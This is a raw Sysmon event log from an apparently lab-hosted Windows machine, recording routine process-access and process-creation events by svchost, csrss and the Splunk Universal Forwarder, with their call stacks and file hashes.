10341000x8000000000000000362671Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:15:30.990{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+106fe|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362670Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:15:30.990{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+108a0|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362669Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:15:30.990{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+10225|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362668Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:15:30.990{8e433fbf-2a44-6013-0600-000000001100}756772C:\Windows\system32\csrss.exe{8e433fbf-3782-6013-cb03-000000001100}9184C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\system32\basesrv.DLL+2fba|C:\Windows\SYSTEM32\CSRSRV.dll+5af4|C:\Windows\SYSTEM32\ntdll.dll+6cedf 10341000x8000000000000000362667Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:15:30.990{8e433fbf-2a45-6013-4f00-000000001100}37406536C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{8e433fbf-3782-6013-cb03-000000001100}9184C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9d934|C:\Windows\System32\KERNELBASE.dll+5f32a|C:\Windows\System32\KERNELBASE.dll+5bcc6|C:\Windows\System32\KERNEL32.DLL+1be93|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+20e72|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 154100x8000000000000000362666Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:15:30.991{8e433fbf-3782-6013-cb03-000000001100}9184C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{8e433fbf-2a44-6013-e703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{8e433fbf-2a45-6013-4f00-000000001100}3740C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000362665Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:15:30.974{8e433fbf-337a-6013-7a02-000000001100}51567184C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-4b00-000000001100}3644C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\tokenbroker.dll+16e05|c:\windows\system32\tokenbroker.dll+1602e|c:\windows\system32\tokenbroker.dll+1269a|c:\windows\system32\tokenbroker.dll+1238b|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+8d664|C:\Windows\System32\combase.dll+c54c6|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+b286f|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931 10341000x8000000000000000362664Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:15:30.974{8e433fbf-337a-6013-7a02-000000001100}51567184C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-4b00-000000001100}3644C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\tokenbroker.dll+168ca|c:\windows\system32\tokenbroker.dll+1602e|c:\windows\system32\tokenbroker.dll+1269a|c:\windows\system32\tokenbroker.dll+1238b|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+8d664|C:\Windows\System32\combase.dll+c54c6|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+b286f|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931 10341000x8000000000000000362663Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:15:30.974{8e433fbf-337a-6013-7a02-000000001100}51567184C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-4b00-000000001100}3644C:\Windows\System32\svchost.exe0x101000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\tokenbroker.dll+1679b|c:\windows\system32\tokenbroker.dll+1602e|c:\windows\system32\tokenbroker.dll+1269a|c:\windows\system32\tokenbroker.dll+1238b|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+8d664|C:\Windows\System32\combase.dll+c54c6|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+b286f|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931 10341000x8000000000000000362662Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:15:30.974{8e433fbf-337a-6013-7a02-000000001100}51567184C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-4b00-000000001100}3644C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\tokenbroker.dll+11658|c:\windows\system32\tokenbroker.dll+11366|c:\windows\system32\tokenbroker.dll+13f74|c:\windows\system32\tokenbroker.dll+1571d|c:\windows\system32\tokenbroker.dll+125ac|c:\windows\system32\tokenbroker.dll+1238b|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+8d664|C:\Windows\System32\combase.dll+c54c6|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+b286f|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8 10341000x8000000000000000362661Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:15:30.974{8e433fbf-337a-6013-7a02-000000001100}51567184C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-4b00-000000001100}3644C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\tokenbroker.dll+11658|c:\windows\system32\tokenbroker.dll+15c25|c:\windows\system32\tokenbroker.dll+125ac|c:\windows\system32\tokenbroker.dll+1238b|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+8d664|C:\Windows\System32\combase.dll+c54c6|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+b286f|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931 10341000x8000000000000000362660Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:15:30.974{8e433fbf-337a-6013-7a02-000000001100}51567184C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-4b00-000000001100}3644C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\tokenbroker.dll+15323|c:\windows\system32\tokenbroker.dll+125ac|c:\windows\system32\tokenbroker.dll+1238b|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+8d664|C:\Windows\System32\combase.dll+c54c6|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+b286f|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480 10341000x8000000000000000362659Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:15:30.974{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-337a-6013-7a02-000000001100}5156C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+1184f|c:\windows\system32\lsm.dll+1172e|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362658Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:15:30.974{8e433fbf-337a-6013-7a02-000000001100}51567184C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-4b00-000000001100}3644C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\tokenbroker.dll+16e05|c:\windows\system32\tokenbroker.dll+1602e|c:\windows\system32\tokenbroker.dll+16f0f|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a 10341000x8000000000000000362657Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:15:30.974{8e433fbf-337a-6013-7a02-000000001100}51567184C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-4b00-000000001100}3644C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\tokenbroker.dll+168ca|c:\windows\system32\tokenbroker.dll+1602e|c:\windows\system32\tokenbroker.dll+16f0f|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a 10341000x8000000000000000362656Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:15:30.974{8e433fbf-337a-6013-7a02-000000001100}51567184C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-4b00-000000001100}3644C:\Windows\System32\svchost.exe0x101000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\tokenbroker.dll+1679b|c:\windows\system32\tokenbroker.dll+1602e|c:\windows\system32\tokenbroker.dll+16f0f|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a 10341000x8000000000000000362655Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:15:30.959{8e433fbf-337a-6013-7a02-000000001100}51567184C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-4b00-000000001100}3644C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\tokenbroker.dll+16e05|c:\windows\system32\tokenbroker.dll+1602e|c:\windows\system32\tokenbroker.dll+1269a|c:\windows\system32\tokenbroker.dll+1238b|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+8d664|C:\Windows\System32\combase.dll+c54c6|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+b286f|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931 10341000x8000000000000000362654Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:15:30.959{8e433fbf-337a-6013-7a02-000000001100}51567184C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-4b00-000000001100}3644C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\tokenbroker.dll+168ca|c:\windows\system32\tokenbroker.dll+1602e|c:\windows\system32\tokenbroker.dll+1269a|c:\windows\system32\tokenbroker.dll+1238b|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+8d664|C:\Windows\System32\combase.dll+c54c6|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+b286f|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931 10341000x8000000000000000362653Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:15:30.959{8e433fbf-337a-6013-7a02-000000001100}51567184C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-4b00-000000001100}3644C:\Windows\System32\svchost.exe0x101000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\tokenbroker.dll+1679b|c:\windows\system32\tokenbroker.dll+1602e|c:\windows\system32\tokenbroker.dll+1269a|c:\windows\system32\tokenbroker.dll+1238b|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+8d664|C:\Windows\System32\combase.dll+c54c6|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+b286f|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931 10341000x8000000000000000362652Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:15:30.959{8e433fbf-337a-6013-7a02-000000001100}51567184C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-4b00-000000001100}3644C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\tokenbroker.dll+11658|c:\windows\system32\tokenbroker.dll+11366|c:\windows\system32\tokenbroker.dll+13f74|c:\windows\system32\tokenbroker.dll+1571d|c:\windows\system32\tokenbroker.dll+125ac|c:\windows\system32\tokenbroker.dll+1238b|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+8d664|C:\Windows\System32\combase.dll+c54c6|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+b286f|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8 10341000x8000000000000000362651Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:15:30.959{8e433fbf-337a-6013-7a02-000000001100}51567184C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-4b00-000000001100}3644C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\tokenbroker.dll+11658|c:\windows\system32\tokenbroker.dll+15c25|c:\windows\system32\tokenbroker.dll+125ac|c:\windows\system32\tokenbroker.dll+1238b|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+8d664|C:\Windows\System32\combase.dll+c54c6|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+b286f|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931 10341000x8000000000000000362650Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:15:30.959{8e433fbf-337a-6013-7a02-000000001100}51567184C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-4b00-000000001100}3644C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\tokenbroker.dll+15323|c:\windows\system32\tokenbroker.dll+125ac|c:\windows\system32\tokenbroker.dll+1238b|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+8d664|C:\Windows\System32\combase.dll+c54c6|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+b286f|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480 10341000x8000000000000000362649Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:15:30.959{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-337a-6013-7a02-000000001100}5156C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+1184f|c:\windows\system32\lsm.dll+1172e|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362648Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 